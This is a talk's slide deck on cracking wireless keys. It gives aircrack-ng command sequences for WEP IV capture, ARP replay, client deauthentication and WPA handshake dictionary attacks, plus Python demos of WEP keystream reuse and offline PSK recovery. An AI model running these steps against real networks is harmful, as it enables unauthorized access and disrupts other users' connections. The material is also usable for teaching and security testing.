
Cracking Wireless

Ryan Curtin
LUG@GT

Ryan Curtin Cracking Wireless - p. 1


Goals

By the end of this presentation (if you stay awake), you will:
 Understand the different types of wireless keys as well as
their advantages and disadvantages
 Understand the legal ramifications of cracking wireless keys
 Have a basic idea of the theory behind the cracking of each
key type
 Know how to use software to crack wireless keys



Setting Up

Most of the work can be done with the aircrack-ng package.
None of these attacks can be performed if you are using
ndiswrapper for your network drivers, or other drivers that do
not support monitor mode (raw 802.11 capture; this is not the
same thing as Ethernet promiscuous mode, and it is what
airmon-ng switches the card into).
Starting / stopping monitor mode:
airmon-ng stop wlan0
airmon-ng check wlan0
airmon-ng start wlan0 <channel>
Note that airmon-ng usually creates a separate monitor
interface (mon0 or wlan0mon, depending on the version); give
that interface name, not wlan0, to the airodump-ng and
aireplay-ng commands that follow.



Checking Injection

Before starting, make sure your card can inject packets into an
AP!
aireplay-ng -9 -e <ESSID> -a <MAC> wlan0
aireplay-ng sends test packets to the AP and reports what
percentage were answered. Make sure the percentage of replies
is not incredibly small (a very low ratio usually means weak
signal or a driver that cannot inject reliably), otherwise it
may be difficult to collect data.



WEP Encryption

The slide title is not redundant! WEP stands for wired
equivalent privacy, not wireless encryption protocol.
 64-bit or 128-bit keys (the 24-bit IV is counted in that
length, so the secret part is only 40 or 104 bits)
 Uses the RC4 stream cipher with a CRC-32 checksum (the ICV)
for integrity; CRC-32 is linear, so it cannot detect
deliberate modification
 Each packet is encrypted with RC4 keyed by IV || secret key;
the 24-bit IV is sent in the clear in front of the packet
 2^24 (about 16.7 million) possible IVs
 If IVs are chosen at random, 50% probability of a repeated IV
after only about 5000 packets (the birthday bound); two
packets with the same IV are encrypted with the same RC4
keystream
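The consequence of a repeated IV, as an added example that is not part of the original slides: two frames under the same IV share one RC4 keystream, so a frame whose plaintext is known (an ARP request, whose first 16 bytes are fixed, which is also why ARP replay is the injection of choice later) gives away the keystream for that IV and decrypts any other frame that reused it. The key, IV and frame contents below are constructed for the demonstration; the RC4, ICV and birthday arithmetic are the real ones.

```python
"""WEP keystream reuse: why repeated IVs break WEP (added example)."""
import struct
import zlib


def rc4_keystream(key: bytes, length: int) -> bytes:
    """Plain RC4: key-scheduling (KSA) followed by keystream output (PRGA)."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    i = j = 0
    out = bytearray()
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor(a: bytes, b: bytes) -> bytes:
    """XOR two byte strings, truncating to the shorter one."""
    return bytes(x ^ y for x, y in zip(a, b))


def wep_icv(plaintext: bytes) -> bytes:
    """WEP integrity check value: CRC-32 of the plaintext, little-endian."""
    return struct.pack("<I", zlib.crc32(plaintext) & 0xFFFFFFFF)


def wep_encrypt(secret_key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """Encrypt one frame body as WEP does: RC4 keyed with IV || secret key over
    plaintext || ICV. The 3-byte IV travels in the clear in front of the body."""
    assert len(iv) == 3 and len(secret_key) in (5, 13)
    body = plaintext + wep_icv(plaintext)
    return iv + xor(body, rc4_keystream(iv + secret_key, len(body)))


def keystream_from_known_plaintext(frame: bytes, plaintext: bytes) -> bytes:
    """Attacker side: a frame with known plaintext yields the keystream for its IV."""
    return xor(frame[3:], plaintext + wep_icv(plaintext))


def decrypt_with_reused_iv(known_frame: bytes, known_plaintext: bytes,
                           target_frame: bytes) -> bytes:
    """Two frames with the same IV share a keystream, so the keystream recovered
    from the known frame decrypts the other. Returns the plaintext (ICV stripped)."""
    if known_frame[:3] != target_frame[:3]:
        raise ValueError("IVs differ; keystreams are not the same")
    ks = keystream_from_known_plaintext(known_frame, known_plaintext)
    if len(ks) < len(target_frame) - 3:
        raise ValueError("known plaintext too short to cover the target frame")
    body = xor(target_frame[3:], ks)
    plaintext, icv = body[:-4], body[-4:]
    if icv != wep_icv(plaintext):
        raise ValueError("ICV mismatch after decryption")
    return plaintext


def packets_for_iv_collision(p: float = 0.5, iv_space: int = 2 ** 24) -> int:
    """Smallest number of randomly chosen IVs for which the probability of at
    least one repeat reaches p (exact birthday-problem product)."""
    no_collision, n = 1.0, 0
    while 1.0 - no_collision < p:
        no_collision *= (iv_space - n) / iv_space
        n += 1
    return n


def run_demo() -> bytes:
    """Decrypt a frame that reused the IV of a known-plaintext ARP request."""
    secret_key = bytes.fromhex("0badc0ffee")   # constructed 40-bit WEP key
    iv = bytes.fromhex("000001")               # constructed IV, reused by the sender
    arp_request = (bytes.fromhex("aaaa030000000806")    # LLC/SNAP, EtherType ARP
                   + bytes.fromhex("0001080006040001")  # Ethernet/IPv4, op = request
                   + bytes.fromhex("001122334455") + bytes([192, 168, 1, 2])
                   + bytes(6) + bytes([192, 168, 1, 1]))  # constructed addresses
    secret = b"GET /admin?token=letmein"        # constructed victim traffic
    frame_a = wep_encrypt(secret_key, iv, arp_request)
    frame_b = wep_encrypt(secret_key, iv, secret)   # same IV -> same keystream
    return decrypt_with_reused_iv(frame_a, arp_request, frame_b)
```

In a real capture the attacker knows only the first 16 bytes of an ARP request, which still yields 16 bytes of keystream per IV; the full frame is constructed here so the whole keystream is available. packets_for_iv_collision() reproduces the 5000-packet figure from the slide.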



Cracking WEP

Different methods have been developed:
 2001: Fluhrer, Mantin, and Shamir publish WEP flaws and a
passive attack (the FMS attack on RC4 weak keys)
 2005: FBI demonstrates WEP cracking in three minutes
 2006: Bittau, Handley, and Lackey show practical active
attacks (the fragmentation attack)
 2007: Pyshkin, Tews, and Weinmann optimize the active attack
(PTW attack)



Using aircrack-ng

1. Gather important data: access point MAC, ESSID, channel
airodump-ng wlan0

2. Start capture of IVs
airodump-ng -c <channel> --bssid <MAC> -w <outputfile> wlan0
Leave this running! You want to capture around 50k IVs
to ensure success (maybe more). That figure is for the PTW
attack; the older FMS/KoreK attacks need several hundred
thousand.

3. Fake authentication with AP
aireplay-ng -1 0 -e <ESSID> -a <MAC> wlan0
(Add -h <your MAC> if the card's MAC is not the one the
driver reports.)



Using aircrack-ng (2)

4. Reinject ARP packets to get more IVs
aireplay-ng -3 -b <MAC> wlan0
Run until you have a substantial number of IVs (in your
airodump-ng process). ARP replay works because the AP
rebroadcasts each replayed request and the target answers it,
both under fresh IVs for the same key.

5. Crack the key!
FMS/KoreK attacks (slow): aircrack-ng -K <capture>.cap
PTW attack (fast!): aircrack-ng <capture>.cap
(PTW is the default in aircrack-ng 1.0 and later; 0.9
selects it with -z.)



WPA Encryption

WPA with TKIP appeared as an interim solution to the WEP
problem while 802.11i was prepared; 802.11i is WPA2.
 WPA: Wi-Fi Protected Access
 TKIP: Temporal Key Integrity Protocol
 TKIP also uses the RC4 cipher (so legacy WEP hardware could
be upgraded in firmware), but with a per-packet key mixing
function and a keyed MIC (Michael) in place of the CRC-32
Use AES (CCMP) instead if possible!
 IV length increased to 48 bits (the TKIP sequence counter,
which also gives replay protection)
 WPA-PSK (pre-shared key): common consumer
environment setup



Cracking WPA-PSK

The WPA PSK initialization process is reproducible!
The 256-bit PMK is derived from the passphrase and the SSID
(PBKDF2-HMAC-SHA1, 4096 iterations), and the per-session key
(PTK) is derived from the PMK plus values that are sent in the
clear during the 4-way handshake: the two MAC addresses and
the two nonces. The MIC on the handshake messages is computed
from the PTK.
Therefore, we must capture a WPA handshake and then try to
replicate it: for each candidate passphrase, derive the PMK
and PTK and check whether the MIC matches. Nothing beyond the
handshake is needed, and the guessing is entirely offline.
Using aircrack-ng
Rainbow Tables

Questions and Comments?



Using aircrack-ng

1. Gather important data: access point MAC, ESSID, channel;
optional: MAC of a connected client
airodump-ng wlan0

2. Start capture of handshakes
airodump-ng -c <channel> --bssid <MAC> -w <outputfile> wlan0
Leave this running! Watch for "WPA handshake:
xx:xx:xx:xx:xx:xx" in the airodump-ng status line

3. (Optional) Fake deauthentication of client to trigger
handshake
aireplay-ng -0 1 -a <AP MAC> -c <client MAC> wlan0
Watch for successful ACK in program output; the client
reconnects and performs a new handshake, which airodump-ng
captures.

4. Brute-force attack on the saved handshake
aircrack-ng -w <dictionary> -b <MAC> <output capture>

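What step 4 does internally, and why the handshake on the previous slide is enough, as an added example that is not the slides' or aircrack-ng's own code: derive the PMK with PBKDF2 from the candidate passphrase and SSID, derive the PTK with the IEEE 802.11i PRF from the MACs and nonces visible in messages 1 and 2, and compare the MIC of message 2. The SSID, MACs, nonces, passphrase, wordlist and EAPOL frame below are constructed for the demonstration, so the "capture" is generated by the same code; the one real value is the IEEE 802.11i Annex H.4 PMK test vector used to check the derivation. Because the SSID is the PBKDF2 salt, this is also why precomputed tables only help for the SSIDs they were built with.

```python
"""WPA-PSK handshake check: PMK -> PTK -> EAPOL MIC (added example)."""
import hashlib
import hmac

MIC_OFFSET = 81   # 4-byte EAPOL header + 77 bytes into the EAPOL-Key descriptor


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf(key: bytes, label: bytes, data: bytes, nbytes: int) -> bytes:
    """802.11i PRF-n: HMAC-SHA1(key, label || 0x00 || data || i) for i = 0, 1, ..."""
    out, i = b"", 0
    while len(out) < nbytes:
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        i += 1
    return out[:nbytes]


def ptk_from_pmk(pmk: bytes, ap_mac: bytes, sta_mac: bytes,
                 anonce: bytes, snonce: bytes) -> bytes:
    """PTK = PRF-512(PMK, "Pairwise key expansion", min/max(MACs) || min/max(nonces)).
    Everything except the PMK is sent in the clear in the 4-way handshake."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf(pmk, b"Pairwise key expansion", data, 64)   # KCK = first 16 bytes


def eapol_mic(kck: bytes, eapol_frame: bytes, keyver: int) -> bytes:
    """MIC over the EAPOL-Key frame with its MIC field zeroed: HMAC-MD5 for key
    descriptor version 1 (TKIP), HMAC-SHA1 truncated to 16 bytes for version 2 (CCMP)."""
    digest = hashlib.md5 if keyver == 1 else hashlib.sha1
    return hmac.new(kck, eapol_frame, digest).digest()[:16]


def build_message2(snonce: bytes, keyver: int) -> bytes:
    """Constructed EAPOL-Key message 2 (client -> AP) with the MIC field zeroed."""
    key_info = 0x0100 | 0x0008 | keyver           # MIC set | pairwise | descriptor version
    body = (bytes([0x02])                          # descriptor type: RSN
            + key_info.to_bytes(2, "big")
            + (0).to_bytes(2, "big")               # key length (0 in message 2)
            + (1).to_bytes(8, "big")               # replay counter
            + snonce + bytes(16) + bytes(8) + bytes(8)   # nonce, key IV, RSC, key ID
            + bytes(16)                            # MIC, zero while computing
            + (0).to_bytes(2, "big"))              # key data length
    return bytes([0x01, 0x03]) + len(body).to_bytes(2, "big") + body


def crack_psk(ssid: str, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes,
              captured_m2: bytes, keyver: int, wordlist):
    """Offline dictionary attack: redo the derivation per candidate, compare MICs."""
    mic = captured_m2[MIC_OFFSET:MIC_OFFSET + 16]
    frame = captured_m2[:MIC_OFFSET] + bytes(16) + captured_m2[MIC_OFFSET + 16:]
    for candidate in wordlist:
        kck = ptk_from_pmk(pmk_from_passphrase(candidate, ssid),
                           ap_mac, sta_mac, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, frame, keyver), mic):
            return candidate
    return None


def run_demo():
    """Generate a handshake for a constructed network, then recover its passphrase."""
    ssid, real_passphrase = "LUGnet", "correct horse battery"     # constructed
    ap_mac, sta_mac = bytes.fromhex("00112233aabb"), bytes.fromhex("66778899ccdd")
    anonce = hashlib.sha256(b"anonce").digest()   # constructed 32-byte nonces
    snonce = hashlib.sha256(b"snonce").digest()
    keyver = 2                                    # CCMP-style MIC
    # Client side: message 2 as the victim would transmit it.
    kck = ptk_from_pmk(pmk_from_passphrase(real_passphrase, ssid),
                       ap_mac, sta_mac, anonce, snonce)[:16]
    frame = build_message2(snonce, keyver)
    captured = frame[:MIC_OFFSET] + eapol_mic(kck, frame, keyver) + frame[MIC_OFFSET + 16:]
    # Attacker side: SSID, MACs, ANonce (message 1), message 2, and a wordlist.
    wordlist = ["password", "linksys", "letmein", "correct horse battery", "hunter2"]
    return crack_psk(ssid, ap_mac, sta_mac, anonce, snonce, captured, keyver, wordlist)
```

The 4096 PBKDF2 iterations per candidate are the whole cost of the attack, which is why tables of precomputed PMKs (next slide) and GPU crackers matter; nothing about the PTK or MIC step is expensive.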
Rainbow Tables

Rainbow tables: precomputed PMKs for large lists of common
passphrases. Because the PMK derivation is salted with the
ESSID, a table is only useful for the SSIDs it was generated
for, so the published tables cover the most common default
SSIDs (linksys, default, NETGEAR, ...).
Available from:
 Church of Wifi Rainbow Tables:
http://www.renderlab.net/projects/WPA-tables/
 The Shmoo Group: http://rainbowtables.shmoo.com/
 Google Search:
http://www.google.com/#q=wpa+rainbow+tables



Questions and Comments?

